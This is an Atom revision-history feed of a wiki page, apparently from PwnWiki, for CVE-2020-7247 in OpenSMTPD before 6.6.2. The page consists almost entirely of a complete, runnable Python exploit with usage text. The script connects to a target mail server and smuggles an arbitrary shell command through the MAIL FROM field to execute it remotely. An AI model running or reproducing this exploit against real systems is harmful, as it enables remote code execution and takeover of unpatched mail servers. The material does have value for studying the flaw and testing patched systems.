https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-7247_OpenSMTPD_6.6.2_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2020-7247 OpenSMTPD 6.6.2 遠程命令執行漏洞 - Revision history
2026-04-17T06:59:15Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-7247_OpenSMTPD_6.6.2_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1291&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage..."
2021-04-09T02:46:07Z
<p>Created page with "==EXP== <pre> # Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution<br />
# Date: 2020-01-29<br />
# Exploit Author: 1F98D<br />
# Original Author: Qualys Security Advisory<br />
# Vendor Homepage: https://www.opensmtpd.org/<br />
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1<br />
# Version: OpenSMTPD < 6.6.2<br />
# Tested on: Debian 9.11 (x64)<br />
# CVE: CVE-2020-7247<br />
# References:<br />
# https://www.openwall.com/lists/oss-security/2020/01/28/3<br />
#<br />
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately<br />
# escape dangerous characters from user-controlled input. An attacker<br />
# can exploit this to execute arbitrary shell commands on the target.<br />
# <br />
#!/usr/local/bin/python3<br />
<br />
from socket import *<br />
import sys<br />
<br />
if len(sys.argv) != 4:<br />
print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))<br />
print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))<br />
sys.exit(1)<br />
<br />
ADDR = sys.argv[1]<br />
PORT = int(sys.argv[2])<br />
CMD = sys.argv[3]<br />
<br />
s = socket(AF_INET, SOCK_STREAM)<br />
s.connect((ADDR, PORT))<br />
<br />
res = s.recv(1024)<br />
if 'OpenSMTPD' not in str(res):<br />
print('[!] No OpenSMTPD detected')<br />
print('[!] Received {}'.format(str(res)))<br />
print('[!] Exiting...')<br />
sys.exit(1)<br />
<br />
print('[*] OpenSMTPD detected')<br />
s.send(b'HELO x\r\n')<br />
res = s.recv(1024)<br />
if '250' not in str(res):<br />
print('[!] Error connecting, expected 250')<br />
print('[!] Received: {}'.format(str(res)))<br />
print('[!] Exiting...')<br />
sys.exit(1)<br />
<br />
print('[*] Connected, sending payload')<br />
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))<br />
res = s.recv(1024)<br />
if '250' not in str(res):<br />
print('[!] Error sending payload, expected 250')<br />
print('[!] Received: {}'.format(str(res)))<br />
print('[!] Exiting...')<br />
sys.exit(1)<br />
<br />
print('[*] Payload sent')<br />
s.send(b'RCPT TO:<root>\r\n')<br />
s.recv(1024)<br />
s.send(b'DATA\r\n')<br />
s.recv(1024)<br />
s.send(b'\r\nxxx\r\n.\r\n')<br />
s.recv(1024)<br />
s.send(b'QUIT\r\n')<br />
s.recv(1024)<br />
print('[*] Done')<br />
</pre></div>
Pwnwiki